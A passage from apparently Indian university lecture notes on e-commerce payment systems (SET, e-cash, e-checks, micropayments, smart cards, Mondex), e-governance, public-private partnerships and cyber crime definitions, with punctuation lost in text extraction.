Step 3 Finally he compares the two terms H[H[PI] || H[OI]] and
DRSA[DS | keypublic_signcardholder ]
They should be the same if the transmitted DS has not been changed otherwise the order is
not valid
The payment gateway is provided with PI H[OI] and DS
By using the dual signature method each cardholder can link OI and PI while releasing
only the necessary information to the relevant party
If either the OI or PI is changed the dual signature will no longer be valid
DIGITAL ENVELOPE ndash
PREPARED BY ARUN PRATAP SINGH 20
20
SET PROTOCOL ndash
SET protocol has four phases initiation purchase authorization and capture
First the cardholder sends a purchase initiation request to the merchant for initializing
the payment
Then the merchant returns a response message to the cardholder
In the second phase the cardholder sends the purchase order together with the
payment instruction to the merchant
In the third phase the merchant obtains the authorization from the issuer via the
payment gateway
Finally the merchant requests a money transfer to its account
E-CASH
Electronic money is paperless cash This money is either stored on a card itself or in an account
associated with the card
The most common examples are transit cards meal plans and PayPal E-Cash can also mean
any kind of electronic payment
Electronic payment systems come in many forms including virtual cheques ATM cards credit
cards and stored value cards The usual security features for such systems are privacy
authenticity and no repudiation
There are four major components in an electronic cash system
Issuers
Customers
Merchants or traders
Regulators
Issuers can be banks or non-bank institutions
PREPARED BY ARUN PRATAP SINGH 21
21
customers are referred to users who spend E-Cash
Merchants and traders are vendors who receive E-Cash
regulators are defined as related authorities or state tax agencies
For an E-Cash transaction to occur we need to go through at least three stages
Account Setup Customers will need to obtain E-Cash accounts through certain issuers
Merchants who would like to accept E-Cash will also need to arrange accounts from
various E-Cash issuers Issuers typically handle accounting for customers and
merchants
Purchase Customers purchase certain goods or services and give the merchants
tokens which represent equivalent E-Cash Purchase information is usually encrypted
when transmitting in the networks
Authentication Merchants will need to contact E-Cash issuers about the purchase and
the amount of E-Cash involved E-Cash issuers will then authenticate the transaction
and approve the amount E-Cash involved
E-cash payment system ndash
For accessing the services online e-cash is a prime method for secure online payments
The following model shows how e cash payment system works
PREPARED BY ARUN PRATAP SINGH 22
22
This is a simple model of E-cash payment system This gives us the idea of how e-cash
payment system works The model is explained properly in upcoming slides
The customer approaches his issuer(bankrsquos) site for accessing his account The issuer in return
issues the money in form of a token which is generally in form of tens and hundreds or as per
specified by the customer
In second phase the customer will endorse those tokens to the merchant for acquiring services
for which the customer will authenticate the payment for the trader
PREPARED BY ARUN PRATAP SINGH 23
23
In third phase the trader will approach the token issuer(customerrsquos bank) and after
authenticating the tokens the issuing bank will convert the tokens into electronic fund and the
same will be transferred into traderrsquos account
Finally after getting the payment for the respective services the trader provides the requisite
service or product and also notifies the customer about the approval of payment made by
customer in traderrsquos account
A system that allows a person to pay for goods or services by transmitting a number
from one computer to another
Like the serial numbers on real currency notes the E-cash numbers are unique
This is issued by a bank and represents a specified sum of real money
PREPARED BY ARUN PRATAP SINGH 24
24
It is anonymous and reusable
Electronic Cash Security
Complex cryptographic algorithms prevent double spending
Anonymity is preserved unless double spending is attempted
Serial numbers can allow tracing to prevent money laundering
E-Cash Processing
E-cash security
Security is of extreme importance while handling the online transactions Faith in the security of
the medium of exchange whether paper or digital is essential for the economy to function
E-cash is much secure than other online payment modes because in this case no credential such
as card-passwords or anything such is involved Its like simply the online fund transfer from
customerrsquos account to traderrsquos account
PREPARED BY ARUN PRATAP SINGH 25
25
However while accessing the customerrsquos account the customer must keep in mind the internet
security sweep or theft The online hacking and cracking can be avoided by using SSL and TSL
website security systems and keeping the website link with safe ldquoHttps ldquo protocols and proper
internet security softwares to keep aside the threats of malware evasdrooping and other security
threats
Advantages
We can transfer funds purchase stocks and offer a variety of other services without
having to handle physical cash or cheques
Electronic cash protects its user against theft With electronic cash the customer does
not need to provide financial information
E-cash supports small payments Other online payment system charge a fee for every
transaction no matter how much high or low it is but e-cash has a specific limit for
additional charges thatrsquos why very low payments are not charged a fee
Limitations
Maybe how much secure the e-cash payment system is but still no one is safe against
the online frauds In this case the trader is referred as fraudulent The trader may take
the amount but may not provide the services
While making the payment its very important that the internet connection and power
supply should be active If the payment is in process and internet supply fails in between
it can lead to loss of information ie amount will be charged but it wont reach to trader
and the refund takes very long time in general the refund time is at least 30-45 days
E-Cash is not for everyone Low income segments without computer and internet access
are unable to enjoy the usage of E-Cash
The rise of E-Cash is inevitable but further improvements are needed Tackling security
anonymity low income group readiness and technology reliability issues will make E-Cash more
perfect In countries such as India where people were hesitant to use such methods has shown
a tremendous use of online payments and E-cash payment system Slowly but steadily the growth
is seen and improving it technologically will make it more reliable and efficient for customers to
use it
PREPARED BY ARUN PRATAP SINGH 26
26
E-CHECK
What is an electronic check
Itrsquos simply an electronic version of a paper check When you convert a traditional check into an electronic payment you can process it through the Automated Clearing House (ACH) Network to save time and moneymdashand because electronic checks have more security features than a paper check they better protect your business and customers Another way to think of an electronic check is when a customer pays by entering in their bank account information online and electronically sending the money Electronic checks are becoming increasingly popular because they are so fast efficient and secure Electronic checks are sometimes called eChecks electronic check conversions or Back Office Conversions (BOCs) Read more on what you need to know as you consider using eChecks in your business
eCheck a new payment instrument combining the security speed and processing efficiencies of
all-electronic transactions with the familiar and well-developed legal infrastructure and business
processes associated with paper checks is the first and only electronic payment mechanism
chosen by the United States Treasury to make high-value payments over the public Internet
How electronic checks work
The process is simple First you run a customerrsquos paper check through an electronic scanner system supplied by your merchant service provider This virtual terminal captures the customers banking information and the payment amount The information is then transferred electronically over the Federal Reserve Banks ACH Network which takes the funds from your customers account and deposits them into yours After payment approval the virtual terminal will print a receipt for the customer to sign and keep Your employee should then void the paper check and return it to the customer Yoursquoll be able to view and report on your merchant transactions online although features may vary depending on your merchant service provider or your payment processing solution provider
How does the ACH Network work with eChecks
The ACH Network is a funds distribution system that moves funds electronically from one entity to another Itrsquos a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed) Given its ability to electronically transfer money directly to and from bank accounts ACH is a faster payment method than traditional paper checks The ACH payment process is close to the paper check process only faster Clients give their bank routing or checking account number and after verification the payment is transferred quite immediately electronically through the ACH system Besides checks the ACH Network also handles debit card transactions direct deposits of payroll Social Security and other government benefits direct debit payments and business-to-business payments
PREPARED BY ARUN PRATAP SINGH 27
27
Reaping the benefits of eChecks
Converting your customersrsquo paper checks into electronic checks helps save time and reduces hassle for your staff because you can submit payments electronically instead of making trips to the bank However time saving and hassle reduction are not the only benefits Read on for more 1 Reduce processing costs by up to 60 eChecks require less manpower to process and donrsquot come with any deposit or transaction fees As a result processing an eCheck is generally much cheaper than processing a paper check or credit card transaction 2 Receive funds sooner Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing Billing companies often receive payments within one day 3 Increase sales If your business doesnrsquot accept paper checks offering eChecks expands your customersrsquo options and can increase sales If yoursquore converting from paper checks to eChecks you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud 4 Work smarter and greener Electronic check conversion is easy to set up It relies on the trusted ACH Network And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks 5 Decrease errors and fraud eChecks reduce the potential for errors and fraud because fewer people handle them Merchant service providers also maintain monitor and check files against negative account databases that store information about individuals or companies that have records of fraud
Protecting your businessmdashand your customers
Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features 1 Authentication Merchants must verify that the person providing the checking account information has the authority to use that account Authentication services and products available to merchants include digital signatures and public key cryptography Also known as digital certificates digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender Theyrsquore used on the Internet to confirm the identity of a customer much as a handwritten signature would Because digital signatures are difficult to tamper with or imitate and are easily transportable theyrsquore a good way to verify identity Digital signatures are often used to implement electronic signatures which include any electronic data that carries the intent of a signature Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message With electronic check conversion the private key is a secret mathematical calculation used to create the digital signature on the echeck and the public key is the key given to anyone
PREPARED BY ARUN PRATAP SINGH 28
28
who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with 2 Duplicate detection Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks 3 Encryption The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL) How to get started with electronic checks
Herersquos how to implement electronic check conversion as quickly and easily as possible 1 Choose a well-established processing company Good pricing is important but working with a reliable processor is essential 2 Notify your customers that your business will begin using electronic check conversion Federal laws require you to post a notification about this change and give your customers a takeaway copy You must also provide customers with a phone number to request more information 3 Look for a processor that makes it easy to align your current business processes with your new electronic processing system export customer data and integrate your new system with your business management software 4 QuickBooks Payments offers a complete payment processing solution Businesses can take payments from their customers in many ways- from ACH bank payments electronic checks to credit cards including Visa MasterCard Discover and American Express In addition to offering many ways to get paid QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature
This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service
1 Payer (customerbill payer) is prompted to authorize electronic debit enter bank routing number (ABA) and account number
PREPARED BY ARUN PRATAP SINGH 29
29
2 Merchants sales system securely transfers order information to CyberSource over the Internet
3 CyberSource forwards bank routing number and account number to processor 4 The routing number and account number are validated and the integrity of the accounts
checking history is verified Processor forwards approvedecline results to CyberSource 5 CyberSource returns approvaldecline message to merchant 6 If approved CyberSource routes check for settlement through a processer to the
Automated Clearinghouse System (ACH) Funds are deposited in approximately 1-3 business days
Four Different Scenarios of the FSTC E-check System ndash
PREPARED BY ARUN PRATAP SINGH 30
30
MICROPAYMENT METHODS
Traditional payment methods are called macropayment methods A new type of payment method known as micropayment method is emerging to cater for
very low value transactions Example
Millicent (pre-paymentcredit based) Paywords (post-payment)
PREPARED BY ARUN PRATAP SINGH 31
31
MICRO PAYMENT IS -
Very small payments made over the Web Transactions too small for credit cards Can be as little as a fraction of a cent Alternative to subscription and advertising Can go in either direction
A micropayment is an e-commerce transaction involving a very small sum of money in exchange
for something made available online such as an application download a service or Web-based
content
Micropayments are sometimes defined as anything less than 75 cents and can be as low as a
fraction of a cent A special type of system is required for such payments which are too small to
be feasible for processing through credit card companies
Heres one scheme for micropayment The user and seller each establish an account with a third-
party service provider who monitors collects and distributes micropayments The seller encodes
per-fee links inside a Web page When the user initiates a transaction payment goes through an
Internet wallet account managed by the service provider Micropayments accumulate until they
are collected as single larger payments Such a system is helpful when a user wants to make
PREPARED BY ARUN PRATAP SINGH 32
32
one-time micropayments to multiple sellers Seller-based accounts are more common for repeat
business with an individual enterprise
Once a common micropayment standard has been established some experts predict that
streaming media sites music and application downloads content vendors sports access sites
and other specialized resources will make pay-per-use common online
Advantages and risks ndash
With a micropayment system many small transactions are summarised over a defined period of
time and charged in one bill For that reason micropayments are applicable for businesses where
even small costs for every single transaction would be inefficient 4) The main benefits from the
customer site in using micropayment are speed and flexibility From the merchantsrsquo site speed
and acceptable transaction fees are very important As the transactions involve small capital
security does not have the highest priority Much more important than trust is security User and
merchants are more likely to use an insecure payment system from a trusted company than a
secure payment system from an untrusted (unknown) company Therefore the market entry
barriers for new providers are high Any company that wishes to enter this area must have plenty
of capital and be willing to invest a lot before return on investment as it is extremely difficult for
new payment systems to achieve widespread acceptance
Payment options ndash
Micropayment providers offer various payment modules Merchants need to sign up for an account with a chosen provider and decide for a module that suits their needs The customer gets an option (or options) how to pay for desired content or goods
The most common micropayment options are listed below 6) Call2pay Payment by telephone The customer is requested to call a toll number The fee is set on a per-call basis for the desired payment amount
Handypay Payment via mobile phone bill The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment
Ebank2pay Payment using online banking The customer transfers the payment amount his or her online banking access and a TAN After making payment the customer receives access to the purchased product
Credit card Payment per credit card The customer enters his credit card data and confirms the transaction The transactions can be optionally carried out with the 3-D Securetrade method (verified by VISAtrade and Mastercard SecureCodetrade)
Direct debit
PREPARED BY ARUN PRATAP SINGH 33
33
Payment by direct debit The customer enters his or her bank ID and account number and confirms the direct debit authorization
PayPal MicroPayments is a micropayment system that charges payments to
users PayPal account and allows transactions of less than US$12 to take place The service is
as of 2013 offered in select currencies only
Micropayment Uses ndash
Publishing
Marketing
Software
Entertainment
Web Services
SMART CARD
A smart card chip card or integrated circuit card (ICC) is any pocket-sized card with
embedded integrated circuits Smart cards are made of plastic generally polyvinyl chloride but
sometimes polyethylene terephthalate based polyesters acrylonitrile butadiene
styrene orpolycarbonate Since April 2009 a Japanese company has manufactured reusable
financial smart cards made from paper
Smart cards can provide identification authentication data storage and application
processing[2] Smart cards may provide strong security authentication for single sign-on (SSO)
within large organizations
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
What is Smart Card
Standard credit card-sized with microchip embedded on it
Two types
Memory-only chips
Microprocessor chips
Can hold up to 32000 bytes
Newer smart cards have math co-processors
PREPARED BY ARUN PRATAP SINGH 34
34
Perform complex encryption routines quickly
In 1968 German inventors patent combination of plastic cards with micro chips
Construction of Smart Cards ndash
PREPARED BY ARUN PRATAP SINGH 35
35
PREPARED BY ARUN PRATAP SINGH 36
36
Why Smart Cards ndash
Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats
Advantages ndash
Flexibility
Security
Portability
Increasing data storage capacity
Reliability
Schematic overview of a smart card
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
